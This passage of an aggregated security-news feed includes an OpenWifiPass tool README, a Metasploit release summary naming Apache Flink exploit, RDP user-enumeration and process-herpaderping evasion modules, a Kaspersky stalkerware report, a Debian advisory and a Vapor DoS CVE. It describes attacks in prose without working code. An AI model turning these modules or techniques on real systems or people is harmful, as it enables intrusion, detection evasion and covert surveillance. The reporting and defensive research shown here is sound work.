\n\n \n\n\n** Requirements ** \n\n\n** Hardware: ** [ Bluetooth Low Energy ](<https://www.kitploit.com/search/label/Bluetooth%20Low%20Energy> \"Bluetooth Low Energy\" ) radio, e.g., [ Raspberry Pi ](<https://www.kitploit.com/search/label/Raspberry%20Pi> \"Raspberry Pi\" ) 4 \n\n** OS: ** Linux (due to the ` bluepy ` dependency) \n\n \n** Install ** \n\n\nClone this repository and install it: \n \n \n git clone [email\u00a0protected]/seemoo-lab/openwifipass.git \n pip3 install ./openwifipass\n\n \n** Run ** \n\n\nRun ` openwifipass ` to share Wi-Fi credentials ( ` SSID ` and ` PSK ` ) with _ any _ requestor (we need super user privileges to use the Bluetooth subsystem): \n \n \n sudo -E python3 -m openwifipass --ssid <SSID> --psk <PSK>\n\n** Use [ quoting ](<https://www.gnu.org/savannah-checkouts/gnu/bash/manual/bash.html#Quoting> \"quoting\" ) of your shell to remove special meaning of certain characters in ` SSID ` / ` PSK ` . ** In the example below, we use single quotes ( ` ' ` ) to prevent shell expansion of the ` $ ` character in the PSK. \n\nA successful run of the protocol would look as follows: \n \n \n [email\u00a0protected]:~/openwifipass $ sudo -E python3 -m openwifipass --ssid OWL --psk '$uper$ecretPassword' \n Start scanning... \n SSID match in PWS advertisement from aa:bb:cc:dd:ee:ff \n Connect to device aa:bb:cc:dd:ee:ff \n Send PWS1 \n Receive PWS2 \n Send M1 \n Receive M2 \n Send M3 \n Receive M4 \n Send PWS3 \n Receive PWS4 \n Wi-Fi Password Sharing completed \n \n\n \n** OPACK ** \n\n\nThis projects contains a reusable OPACK (de)serializer. Read [ OPACK.md ](<https://github.com/seemoo-lab/openwifipass/blob/main/OPACK.md> \"OPACK.md\" ) for more information. \n\n \n** Authors ** \n\n\n * Jannik Lorenz \n \n** Publications ** \n\n\n * Milan Stute, Alexander Heinrich, Jannik Lorenz, and Matthias Hollick. 
** Disrupting Continuity of Apple\u2019s Wireless Ecosystem Security: New Tracking, DoS, and MitM Attacks on iOS and macOS Through Bluetooth Low Energy, AWDL, and Wi-Fi. ** _ 30th USENIX Security Symposium (USENIX Security \u201921) _ , August 11\u201313, 2021, Vancouver, B.C., Canada. _ To appear _ . \n * Jannik Lorenz. ** Wi-Fi Sharing for All: [ Reverse Engineering ](<https://www.kitploit.com/search/label/Reverse%20Engineering> \"Reverse Engineering\" ) and Breaking the Apple Wi-Fi Password Sharing Protocol. ** Bachelor thesis, _ Technical University of Darmstadt _ , March 2020. \n \n \n\n\n** [ Download Openwifipass ](<https://github.com/seemoo-lab/openwifipass> \"Download Openwifipass\" ) **\n", "edition": 1, "modified": "2021-02-26T11:30:06", "published": "2021-02-26T11:30:06", "id": "KITPLOIT:1929489446814904344", "href": "http://www.kitploit.com/2021/02/openwifipass-open-source-implementation.html", "title": "OpenWifiPass - An Open Source Implementation Of Apple's Wi-Fi Password Sharing Protocol In Python", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}], "rapid7blog": [{"lastseen": "2021-02-26T20:49:49", "bulletinFamily": "info", "cvelist": ["CVE-2020-17519", "CVE-2021-3156"], "description": "## Hey who finked about Flink?\n\n\n\nIn this week's round of modules, contributor [bcoles](<https://github.com/bcoles>) offered up two modules to leverage that [Apache Flink](<https://flink.apache.org/>) install you found in some fun new ways. If you are just looking to filch a few files, `auxiliary/scanner/http/apache_flink_jobmanager_traversal` leverages [CVE-2020-17519](<https://attackerkb.com/topics/t2rkmB0Uem/cve-2020-17519?referrer=blog>) to pilfer the filesystem on Flink versions 1.11.0 thru 1.11.2. 
The second module, for a little extra fun, `exploit/multi/http/apache_flink_jar_upload_exec` utilizes the job functionality in Flink to run arbitrary Java code as the web server user; turns out there is a `meterpreter` for that!\n\n## RDP: a dream and a nightmare for the sysAdmin near you.\n\nEver wonder if exposing a remote desktop in a web page was a good idea? I mean, it's just a web server, the internet loves those. Turns out timing attacks can expose your usernames when someone chooses to pay close attention. A recently contributed module, `auxiliary/scanner/http/rdp_web_login` by [Matthew Dunn](<https://github.com/k0pak4>), can even pay attention for you. Using the module you can now enumerate users by setting a few options.\n\n## Have you heard of herpaderping?\n\nFor those that have, Metasploit now has a new toy for you. [Christophe De La Fuente](<https://github.com/cdelafuente-r7>) built on some great research by [Johnny Shaw](<https://github.com/jxy-s>) to bring this technique to Metasploit. Using the new `evasion/windows/process_herpaderping` module, you too can generate Windows PE files that hide the code behind the curtain, if you will, when executed on a target.\n\n## Join the community.\n\nFor anyone interested in working with Metasploit in this year's [Google Summer of Code](<https://summerofcode.withgoogle.com/>), you'll have to wait until March 9th to find out if we've been accepted as mentors. However, you can get a head start by checking out our current project [shortlist](<https://github.com/rapid7/metasploit-framework/wiki/GSoC-2021-Project-Ideas>). 
Said shortlist is still being worked on, and applicants can suggest their own project ideas, so get looking and see what jumps out at you!\n\n## New Modules (4)\n\n * [Apache Flink JobManager Traversal](<https://github.com/rapid7/metasploit-framework/pull/14766>) by 0rich1 - Ant Security FG Lab, [Hoa Nguyen - Suncsr Team](<https://vn.linkedin.com/in/hoanx4>), and [bcoles](<https://github.com/bcoles>), which exploits [CVE-2020-17519](<https://attackerkb.com/topics/t2rkmB0Uem/cve-2020-17519?referrer=blog>), adds an auxiliary module that leverages the directory traversal vulnerability within Apache Flink to recover files from the affected server. This vulnerability does not require authentication.\n * [Apache Flink JAR Upload Java Code Execution](<https://github.com/rapid7/metasploit-framework/pull/14771>) by [Henry Chen](<https://github.com/chybeta>), [bcoles](<https://github.com/bcoles>), and [bigger.wing](<https://github.com/biggerwing>), adds an exploit module that leverages Apache Flink to upload and run an arbitrary JAR file.\n * [Microsoft RDP Web Client Login Enumeration](<https://github.com/rapid7/metasploit-framework/pull/14544>) by [Matthew Dunn](<https://github.com/k0pak4>), adds a scanner module that leverages the timing behavior of the RDP Web Client authentication process to determine valid users.\n * [Process Herpaderping evasion technique](<https://github.com/rapid7/metasploit-framework/pull/14648>) by [Christophe De La Fuente](<https://github.com/cdelafuente-r7>) and [Johnny Shaw](<https://github.com/jxy-s>), adds an evasion module that takes advantage of the Process Herpaderping evasion technique.\n\n## Enhancements and features\n\n * [#14784](<https://github.com/rapid7/metasploit-framework/pull/14784>) from [bcoles](<https://github.com/bcoles>) This fixes a bug in the ScadaBR credential dumping module that prevented it from processing response data.\n\n * [#14617](<https://github.com/rapid7/metasploit-framework/pull/14617>) from 
[zeroSteiner](<https://github.com/zeroSteiner>) The core Meterpreter and console libraries have been updated to better handle cases where a given implementation of Meterpreter may not support a certain command. Instead of each version of Meterpreter trying to handle invalid commands, which previously led to errors, each implementation now checks whether it supports the command and returns an error message if it does not. Additionally, the output from running the `help` or `?` command inside the `meterpreter` prompt has been updated so as to not display a command that a given Meterpreter implementation does not support. Tests have also been updated accordingly to check that this functionality works as expected.\n\n * [#14670](<https://github.com/rapid7/metasploit-framework/pull/14670>) from [adfoster-r7](<https://github.com/adfoster-r7>) Word wrapping of Rex tables is now enabled by default for all Rex tables except for those output by the `creds` and `search` commands. This feature can optionally be turned off by issuing the `features set wrapped_tables false` command.\n\n * [#14735](<https://github.com/rapid7/metasploit-framework/pull/14735>) from [adfoster-r7](<https://github.com/adfoster-r7>) Updates have been made to require all new modules to pass RuboCop and msftidy.rb checks prior to being merged into the framework. 
These checks will now be run automatically on PRs to detect issues, rather than users having to run these tools manually to detect code quality issues within their contributions.\n\n * [#14740](<https://github.com/rapid7/metasploit-framework/pull/14740>) from [zeroSteiner](<https://github.com/zeroSteiner>) This makes a few improvements to the [CVE-2021-3156](<https://attackerkb.com/topics/krVyNG9US8/cve-2021-3156-baron-samedit?referrer=blog>) module and adds a couple of features that were left out of the first submission due to time constraints (e.g. cleanup and randomisation of the payload library).\n\n## Bugs Fixed\n\n * [#14748](<https://github.com/rapid7/metasploit-framework/pull/14748>) from [cdelafuente-r7](<https://github.com/cdelafuente-r7>) A bug has been fixed in `Auxiliary::AuthBrute` that caused a crash when the `DB_ALL_USERS` or `DB_ALL_PASS` options were set.\n * [#14789](<https://github.com/rapid7/metasploit-framework/pull/14789>) from [zeroSteiner](<https://github.com/zeroSteiner>) A bug has been fixed whereby Meterpreter sessions were incorrectly being validated because TLV encryption for the session would take place before session verification. The fix now considers Meterpreter sessions valid if they successfully negotiate TLV encryption. 
This fix also removes the `AutoVerifySession` datastore option since all valid Meterpreter instances should negotiate TLV encryption automatically.\n * [#14802](<https://github.com/rapid7/metasploit-framework/pull/14802>) from [dwelch-r7](<https://github.com/dwelch-r7>) A bug within the Kiwi library has been fixed whereby commands passed to Kiwi via the `kiwi_cmd` command in Metasploit were not being properly enclosed in double quotes, which could lead to Kiwi thinking the user had passed it two separate commands to execute rather than one space-separated command.\n * [#14812](<https://github.com/rapid7/metasploit-framework/pull/14812>) from [dwelch-r7](<https://github.com/dwelch-r7>) Restores missing requires for sock5 proxy support.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.31...6.0.32](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-02-18T05%3A04%3A04-06%3A00..2021-02-25T11%3A27%3A42-06%3A00%22>)\n * [Full diff 6.0.31...6.0.32](<https://github.com/rapid7/metasploit-framework/compare/6.0.31...6.0.32>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
\nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "modified": "2021-02-26T19:23:43", "published": "2021-02-26T19:23:43", "id": "RAPID7BLOG:46A54401F6ED43B72F664A32EA043CB8", "href": "https://blog.rapid7.com/2021/02/26/metasploit-wrap-up-100/", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2021-02-26T15:52:50", "bulletinFamily": "blog", "cvelist": [], "description": "\n\n [The state of stalkerware in 2020 (PDF)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/100/2020/03/25175212/EN_The-State-of-Stalkerware-2020.pdf>)\n\n## Main findings\n\nKaspersky's data shows that the scale of the stalkerware issue has not improved much in 2020 compared to the last year:\n\n * The number of people affected is still high. In total, 53,870 of our mobile users were affected globally by stalkerware in 2020. Keeping in mind the big picture, these numbers only include Kaspersky users, and the total global numbers will be higher. Some affected users may use another cybersecurity solution on their devices, while some do not use any solution at all.\n * With more than 8,100 users affected globally, Nidb is the most used stalkerware sample, according to our 2020 stats. 
This sample is used to sell a number of different stalkerware products such as iSpyoo, TheTruthSpy and Copy9 among others.\n * In terms of geographic spread, we see a largely consistent trend emerging: Russia, Brazil, and the United States of America (USA) remain the most affected countries globally, and they are the three leading countries in 2020.\n * In Europe, Germany, Italy and the United Kingdom (UK) are the top three most-affected countries respectively.\n\n## Introduction and methodology\n\nTechnology has enabled people to connect more than ever before. We can choose to digitally share our lives with our partner, family, and friends regardless of how far we are physically. Yet, we are also seeing a rise in software that enables users to remotely spy on another person's life via their digital device, without the affected user giving their consent or being notified.\n\nThe software, known as stalkerware, is commercially available to everyone with access to the internet. The risks of stalkerware can go beyond the online sphere and enter the physical world. The Coalition Against Stalkerware [warns](<https://stopstalkerware.org/what-is-stalkerware/>) that stalkerware "may facilitate intimate partner surveillance, harassment, abuse, stalking, and/or violence." Stalkerware can also operate in stealth mode, meaning that there is no icon displayed on the device to indicate its presence and it is not visible to the affected user. The majority of affected users do not even know this type of software exists. This means they cannot protect themselves, online or offline, especially as the perpetrator using stalkerware usually knows their victim personally.\n\nIn recent years, Kaspersky has been actively working with partners to end the use of stalkerware. In 2019, we created a special alert that notifies users if stalkerware is installed on their phones. Following that we became one of ten founding members of the Coalition Against Stalkerware. 
We also published our first full [report](<https://press.kaspersky.com/stories/stalkerware/>) on the state of stalkerware in the same year to understand the scale of the problem.\n\nThis report continues to examine the issue of stalkerware and presents new statistics from 2020, in comparison to our previous data. The data in this report has been taken from aggregated threat statistics obtained from the Kaspersky Security Network. The Kaspersky Security Network is dedicated to processing cybersecurity-related data streams from millions of voluntary participants around the world. _All received data is anonymized. To calculate our statistics, we review the consumer line of Kaspersky's mobile security solutions._\n\n## The issue of, and the story behind, stalkerware\n\nStalkerware is software that is commercially available to everyone with access to the internet. It is used to spy remotely on another person via their device, without the affected user giving their consent or being notified. Stalkerware operates in stealth mode, meaning that there is no icon displayed on the device indicating its presence, and it is not visible to the affected user. Therefore, the Coalition Against Stalkerware [defines](<https://stopstalkerware.org/what-is-stalkerware/>) stalkerware as software which "may facilitate intimate partner surveillance, harassment, abuse, stalking, and/or violence".\n\n### The dimension of cyberviolence\n\nAccording to a [report](<https://eige.europa.eu/news/cyber-violence-growing-threat-especially-women-and-girls>) by the European Institute for Gender Equality, "seven in ten women in Europe who have experienced cyberstalking have also experience at least one form of physical and/or sexual violence from an intimate partner". Echoing these findings, experts from non-profit organizations (NPOs) that help domestic abuse survivors and victims emphasize that cyberstalking is also a form of violence. 
Just as with physical, psychological, and economic violence, an abuser can use surveillance to obtain complete control of their victim/survivor[1] and stay in charge of the situation.\n\nUsing stalkerware, the extent of control held by the abuser can be immense. Depending on the type installed, stalkerware may have a variety of functions to intrude into the victim's privacy. With the software's help, an abuser can:\n\n * Read anything the surveilled person types \u2013 logging each keystroke on the device, including credentials to any kind of services such as banking applications, online shops and social networks, etc.\n * Know where they are \u2013 by tracking a person's movements with GPS, in real time\n * Hear what they say \u2013 eavesdrop on calls, or even record them\n * Read messages on any messenger, regardless of whether encryption is used\n * Monitor social network activity\n * See photos and videos\n * Switch on the camera\n\nAll of this private information can be collected, usually from a mobile device, such as a tablet or a smartphone.\n\nNon-profit organizations from the Coalition Against Stalkerware are experiencing a growing number of survivors seeking help with the problem:\n\n * Findings from the Second National Survey on technology abuse and domestic violence in **Australia,** launched by WESNET with the assistance of Dr. 
Delanie Woodlock and researchers from Curtin University, state that 99.3% of domestic violence practitioners have clients experiencing technology-facilitated abuse and that the use of video cameras increased by 183.2% between 2015 and 2020.\n * According to a study on cyberviolence in intimate relationships, conducted by the Centre Hubertine Auclert in **France**, 21% of victims have experienced stalkerware at the hands of their abusive partner, and 69% of victims have the feeling that the personal information on their smartphone has been accessed by their partner in a hidden way.\n * In **Germany**, for several years, Women's Counselling Centers and Rape Crisis Centers (bff) have noticed an increasing use of stalkerware in conjunction with partner relationships.\n * In the **USA**, stalking impacts an estimated 6-7.5 million people over a one-year period, and one-in-four victims report being stalked through some form of technology, according to the Stalking Prevention Awareness & Resource Center (SPARC).\n\n### Physical access is the key\n\nUnfortunately, it is not too difficult to secretly install stalkerware on a victim's phone. The main barrier that exists is that stalkerware has to be configured on an affected device. Because the distribution vector of such applications is very different from common malware distribution schemes, it is impossible to get infected with stalkerware through a spam message including a link to stalkerware or a trap via normal web surfing.\n\nThis means that the abuser will need to have physical access to the target device in order to install stalkerware. This is possible if the device either has no PIN, pattern, or password to protect it or, alternatively, the abuser knows the victim/survivor personally. Installation on the target device can be completed within a few minutes.\n\nPrior to accessing the survivor's device, the abuser has to collect a link to the installation package from the stalkerware developer's webpage. 
In most cases, the software is not downloaded from an official application store. For Android devices, Google [banned](<https://support.google.com/googleplay/android-developer/answer/10065487?hl=en>) applications that are clearly stalkerware from its Google Play application store in 2020. This means the abuser will not be able to install such an application from the general app store. Instead, the abuser must follow several steps before being able to install stalkerware. As a result, the abuser may leave traces in the device settings that a user can check if they are concerned they may be being spied on.\n\nStalkerware tools are less frequent on iPhones than on Android devices because iOS is traditionally a closed system. However, perpetrators can work around this limitation on jailbroken iPhones. They still need physical access to the phone to jailbreak it, so iPhone users who fear surveillance should always keep an eye on their device. Alternatively, an abuser can offer their victim an iPhone \u2013 or any other device \u2013 with pre-installed stalkerware as a gift. There are many companies that make their services available online to install such tools on a new phone and deliver it to an unwitting addressee in factory packaging to celebrate a special occasion.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/19142049/stalkerware_report_2020_01.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/19142131/stalkerware_report_2020_02.png>)\n\n### The risk of privacy leaks\n\nThe information monitored via stalkerware will be available to at least one person \u2013 the abuser who installed stalkerware on the survivor's phone. However, sometimes it is possible that all the private data may become publicly available. Year on year, stalkerware servers are either hacked or left openly unprotected so that information can be accessed and leaked online. 
For example, in 2020, such a data breach occurred due to a product provided by [ClevGuard](<https://techcrunch.com/2020/02/20/kidsguard-spyware-app-phones/>). In previous years, we have seen similar incidents with [Mobiispy](<https://www.vice.com/en/article/7xnybe/hosting-provider-takes-down-spyware-mobiispy>) in 2019 and with [MSpy](<https://searchsecurity.techtarget.com/news/252448327/Another-mSpy-leak-exposed-millions-of-sensitive-user-records>) in 2018 and 2015.\n\nThese are just a few examples of a long list in which databases from companies developing stalkerware have been exposed, affecting millions of user accounts. With the possibility to track a person's location, it means that not only their cyberprivacy is lost but also their security in the physical world may be at risk.\n\n### The legal status\n\nStalkerware applications are sold and provided by companies under various facades, such as child monitoring or employee tracking solutions. While laws vary from one country and state to another, they are catching up. Generally speaking, it is only illegal to use such tools and apps that record user activity without their consent or that of legal authority. Slowly we are seeing some shifts in legislation. For instance, in 2020, France reinforced sanctions on secret surveillance: geolocating someone without their consent is now punishable with one year imprisonment and a fine of 45,000 euros. If this is done within a couple, the sanctions are potentially higher, including two years' imprisonment and a fine of 60,000 euros.\n\nStalkerware tools often violate laws and expose the stalker to legal liability for any recordings made without the victim's knowledge. Stalkers must realize that they are breaking the law. If the use of stalkerware is reported, the punishment applies to the private perpetrator who installed the software \u2013 not its vendor. In the USA, only two stalking app developers have been fined in recent history. 
One had to pay a record 500,000 US dollar fine, which put an end to the app development process, while the other got off with an order to change the app's functionality for future sales.\n\n## The scale of the issue\n\n### Global detection figures \u2013 affected users\n\nIn this section, we look at the global numbers of unique users on whose mobile device stalkerware was detected.\n\nThe 2020 data shows that the stalkerware situation has not improved much: the number of affected people is still high. A total of 53,870 unique users were affected globally by stalkerware in 2020, whereas in 2019, 67,500 unique users were affected globally. However, it must be taken into account that 2020 was an unprecedented year in which lives have changed in a dramatic way across the globe.\n\nTo fight the COVID-19 pandemic, all countries in the world have faced massive restrictions such as self-isolation measures or lockdowns in order to make people stay at home. Considering that stalkerware is used as another tool to control an intimate partner who the abuser lives with as they go about their day-to-day life, this can explain the somewhat lower numbers in comparison with the previous year.\n\n_Unique users affected by stalkerware globally from 2018 until 2020 \u2013 total per year ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/26124943/01-en-stalkerware-report.png>))_\n\nWhen looking at the figures of the total number of unique users affected by stalkerware in 2020 worldwide per month, this trend becomes even more noticeable. The first two months of the year were stable with many cases of affected devices arising, showing stalkerware was quite popular. The situation changed in March when many countries decided to announce quarantine measures. 
The curve shows a trend that the numbers began to stabilize as of June 2020 when many countries around the world eased restrictions.\n\n_Unique users affected by stalkerware in 2020 worldwide \u2013 total by month ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/19142943/02-en-stalkerware-report-1.png>))_\n\nThat said, the 2020 numbers are still on a high, stable level. In comparison, in 2018, there were 40,173 detections of unique users being affected globally by stalkerware. This brings into perspective the total numbers from 2020, as we have seen a growing integration of technology into our lives. Sadly, this also means the software used for stalking is becoming more common as another form of intimate partner violence.\n\n### Global detection figures \u2013 stalkerware samples\n\nIn this section, we analyze which stalkerware samples are actually the most used to control mobile devices on a global level. In 2020 the most detected samples can be seen in the following results.\n\n**Top 10 most detected stalkerware samples globally**\n\n** ** | **Samples** | **Affected users** \n---|---|--- \n**1** | Monitor.AndroidOS.Nidb.a | 8147 \n**2** | Monitor.AndroidOS.Cerberus.a | 5429 \n**3** | Monitor.AndroidOS.Agent.af | 2727 \n**4** | Monitor.AndroidOS.Anlost.a | 2234 \n**5** | Monitor.AndroidOS.MobileTracker.c | 2161 \n**6** | Monitor.AndroidOS.PhoneSpy.b | 1774 \n**7** | Monitor.AndroidOS.Agent.hb | 1463 \n**8** | Monitor.AndroidOS.Cerberus.b | 1310 \n**9** | Monitor.AndroidOS.Reptilic.a | 1302 \n**10** | Monitor.AndroidOS.SecretCam.a | 1124 \n \n 1. With more than 8,100 users having been affected by it, **Nidb** was the most used stalkerware sample in 2020. The Nidb creator sells their product as Stalkerware as a Service. 
This means that anyone could rent their control server software and mobile application, rename it to any suitable marketing name and sell it separately\u2014examples of this include iSpyoo, TheTruthSpy, Copy9, and others.\n 2. Both second and eighth place are occupied by Cerberus. These are two different samples under the same family. Variant **Cerberus.a** affected more than 5,400 users.\n 3. **Agent.af** comes in third place, with more than 2,700 users having been affected. This is marketed as Track My Phone and has typical features such as reading messages from any messenger, logging a person's call history, and tracking geolocation.\n 4. **Anlost.a** is a good example of stalkerware in disguise. It is advertised as an antitheft application, and its icon is present on the home screen (not usual behavior for stealthy stalkerware apps). Therefore, it is available on the Google Play Store. That said, it is possible to deliberately hide the icon from the home screen. One of the key functionalities of the application is to intercept SMS messages and read the call log. More than 2,200 users have been affected by this sample.\n 5. **MobileTracker.c** has several functionalities such as intercepting messages from popular social networks and taking remote control of the affected device. More than 2,100 users have been affected by this sample.\n 6. **PhoneSpy** is also known as Spy Phone app or Spapp Monitoring. This application offers many spying features, covering all popular instant messengers and social networks.\n 7. **Agent.hb** is another version of MobileTracker. Like the original version, it offers many functionalities.\n 8. **Cerberus.b** is a different sample from the same family as Cerberus.a.\n 9. **Reptilic.a** is stalkerware that includes many features such as social media monitoring, call recordings, and browser history monitoring.\n 10. 
**SecretCam.a** is camera stalking software, meaning it is able to secretly record video from the front or back camera of the affected device.\n\n### Geography of affected users\n\nStalkerware is a global phenomenon that affects countries regardless of size, society, or culture. When looking at the top 10 affected countries worldwide in 2020, Kaspersky's findings show that largely the same countries remain the most affected, with Russia in the number one spot. Yet, we see an increase in stalkerware activity in Brazil and the USA in 2020 compared to 2019. However, we detected fewer incidents in India, which has fallen in the rankings. We have also detected a higher number of incidents in Mexico, which has risen in the ranking two places.\n\n**Top 10 most affected countries by stalkerware - globally**\n\n** ** | **Country** | **Affected users** \n---|---|--- \n**1** | Russian Federation | 12389 \n**2** | Brazil | 6523 \n**3** | United States of America | 4745 \n**4** | India | 4627 \n**5** | Mexico | 1570 \n**6** | Germany | 1547 \n**7** | Iran | 1345 \n**8** | Italy | 1144 \n**9** | United Kingdom | 1009 \n**10** | Saudi Arabia | 968 \n \nWhen considering Europe, Germany, Italy and the UK are the three most affected countries, in that order. They are followed by France in fourth place and Spain in fifth place.\n\n**Top 10 most affected countries by stalkerware - Europe**\n\n** ** | **Country** | **Affected users** \n---|---|--- \n**1** | Germany | 1547 \n**2** | Italy | 1144 \n**3** | United Kingdom | 1009 \n**4** | France | 904 \n**5** | Spain | 873 \n**6** | Poland | 444 \n**7** | Netherlands | 321 \n**8** | Romania | 222 \n**9** | Belgium | 180 \n**10** | Austria | 153 \n \n## How to check if a mobile device has stalkerware installed\n\nIt's hard for everyday users to know if stalkerware is installed on their devices. 
Generally, this type of software remains hidden, which includes hiding the icon of the stalkerware app on the home screen and in the phone menu and even cleaning any traces that have been made. However, it may give itself away, and there are some warning signs. Among the most important are:\n\n * Keep an eye out for a fast-draining battery, constant overheating and mobile data traffic growth.\n * Do regular antivirus scanning on your Android device: If the cybersecurity solution detected stalkerware, **do not rush to remove it as the abuser may notice**. Have a safety plan in place and reach out to a local help organization.\n * Check browser history: To download stalkerware, the abuser will have to visit some web pages that the affected user does not know about. Alternatively, there could be no history at all if the abuser wiped it out.\n * Check "unknown sources" settings: If "unknown sources" are enabled on your device, it might be a sign that unwanted software was installed from a third-party source.\n * Check permissions of installed apps: A stalkerware application may be disguised under a wrong name with suspicious access to messages, call logs, location, and other personal activity.\n\nHowever, it's also important to understand that warning signs or symptoms are not necessarily proof that stalkerware is installed on a device.\n\n## How to minimize the risk\n\nThere are a few pieces of advice that can help to increase your digital safety:\n\n * Never lend your phone to anyone without seeing what happens with the phone, and do not leave it unlocked.*\n * Use a complex lock screen password and change passwords on a regular basis.\n * Do not disclose your password to anyone \u2013 not even your intimate partner or family members or close friends.*\n * [Do regular checks of your 
phone](<https://usa.kaspersky.com/blog/five-regular-checks-for-android/22892/?cid=usa_kdus_acq_ona_smm__onl_b2c_som_post_______&utm_source=kdaily&utm_medium=blog&utm_campaign=us_stalkerware_zt0106&utm_content=sm-post&utm_term=us_kdaily_organic_r106oc0m7jbkr5g>)\u2014 delete apps you don't use and review the permissions granted to each app.\n * Disable the option of third-party application installation on Android devices.\n * Protect your Android devices with a cyber-security solution, such as [Kaspersky Internet Security for Android](<https://usa.kaspersky.com/internet-security?cid=usa_socmedregular_acq_ona_smm__onl_b2c__lnk____kis___>) (for free), which detects stalkerware and issues warnings.\n\n_*In the context of domestic violence and abusive relationships it may be difficult or even impossible to deny the abusive partner access to the phone._\n\n## Kaspersky's activities and contribution to end cyberviolence\n\nKaspersky is actively working to end the use of cyberviolence and stalkerware, as a [company](<https://csr.kaspersky.com/en/antistalking/eng.html>), and together with many other partners. In 2019, we created a special alert that notifies users when stalkerware is installed on their phones. In the same year, with nine other founding members we created the [Coalition Against Stalkerware](<https://stopstalkerware.org/>). In 2020, we created TinyCheck, a free tool to detect stalkerware on mobile devices \u2013 specifically for service organizations working with victims of domestic violence. TinyCheck can be found on <https://github.com/KasperskyLab/TinyCheck>. 
Since 2021, we are one of five partners in an EU-wide project aimed at tackling gender-based cyberviolence and stalkerware called DeStalk, which the European Commission chose to support with its Rights, Equality and Citizenship Program.\n\n## About the Coalition Against Stalkerware\n\nThe Coalition Against Stalkerware ("CAS" or "Coalition") is a group dedicated to addressing abuse, stalking, and harassment via the creation and use of stalkerware. Launched in November 2019, the Coalition Against Stalkerware gained 26 partners in its first year. These include founding partners \u2013 Avira, Electronic Frontier Foundation, the European Network for the Work with Perpetrators of Domestic Violence, G DATA Cyber Defense, Kaspersky, Malwarebytes, The National Network to End Domestic Violence, NortonLifeLock, Operation Safe Escape, and WEISSER RING. The Coalition looks to bring together a diverse array of organizations to actively address the criminal behavior perpetrated through stalkerware and increase public awareness about this important issue. Due to the high societal relevance for users all over the globe and new variants of stalkerware emerging periodically, the Coalition Against Stalkerware is open to new partners and calls for cooperation. To find out more about the Coalition Against Stalkerware please visit the official website [www.stopstalkerware.org](<http://www.stopstalkerware.org>)\n\n[1] Experts refer in their terminology more and more to the empowering term survivor instead of victim. 
Hence, in this report, we will use both terms.", "modified": "2021-02-26T08:00:11", "published": "2021-02-26T08:00:11", "id": "SECURELIST:790E93B8B357EC3A985B121FDCB1E991", "href": "https://securelist.com/the-state-of-stalkerware-in-2020/100875/", "type": "securelist", "title": "The state of stalkerware in 2020", "cvss": {"score": 0.0, "vector": "NONE"}}], "debian": [{"lastseen": "2021-02-26T13:31:30", "bulletinFamily": "unix", "cvelist": ["CVE-2021-21239", "CVE-2017-1000433"], "description": "- -------------------------------------------------------------------------\nDebian LTS Advisory DLA-2577-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ Abhijith PA\nFebruary 26, 2021 https://wiki.debian.org/LTS\n- -------------------------------------------------------------------------\n\nPackage : python-pysaml2\nVersion : 3.0.0-5+deb9u2\nCVE ID : CVE-2017-1000433 CVE-2021-21239\nDebian Bug : 886423 CVE-2021-21239\n\nSeveral issues have been found in python-pysaml2, a pure Python \nimplementation of the SAML Version 2 standard.\n\nCVE-2017-1000433\n\n pysaml2 accepts any password when run with Python optimizations \n enabled. This allows attackers to log in as any user without \n knowing their password.\n\nCVE-2021-21239\n\n pysaml2 has an improper verification of cryptographic signature\n vulnerability. Users of pysaml2 that use the default\n CryptoBackendXmlSec1 backend and need to verify signed SAML\n documents are impacted. PySAML2 does not ensure that a signed\n SAML document is correctly signed. 
The default\n CryptoBackendXmlSec1 backend uses the xmlsec1 binary to\n verify the signature of signed SAML documents, but by default\n xmlsec1 accepts any type of key found within the given document.\n xmlsec1 needs to be configured explicitly to use only _x509\n certificates_ for the verification process of the SAML document signature.\n\nFor Debian 9 stretch, these problems have been fixed in version\n3.0.0-5+deb9u2.\n\nWe recommend that you upgrade your python-pysaml2 packages.\n\nFor the detailed security status of python-pysaml2 please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/python-pysaml2\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 1, "modified": "2021-02-26T05:06:18", "published": "2021-02-26T05:06:18", "id": "DEBIAN:DLA-2577-1:3F007", "href": "https://lists.debian.org/debian-lts-announce/2021/debian-lts-announce-202102/msg00038.html", "title": "[SECURITY] [DLA 2577-1] python-pysaml2 security update", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2021-02-26T14:32:00", "description": "Vapor is a web framework for Swift. In Vapor before version 4.40.1, there is a DoS attack against anyone who bootstraps a metrics backend for their Vapor app. The following is the attack vector: 1. Send unlimited requests against a Vapor instance with different paths. This will create unlimited counters and timers, which will eventually drain the system. 2. Downstream services might suffer from this attack as well by being spammed with error paths. This has been patched in 4.40.1. 
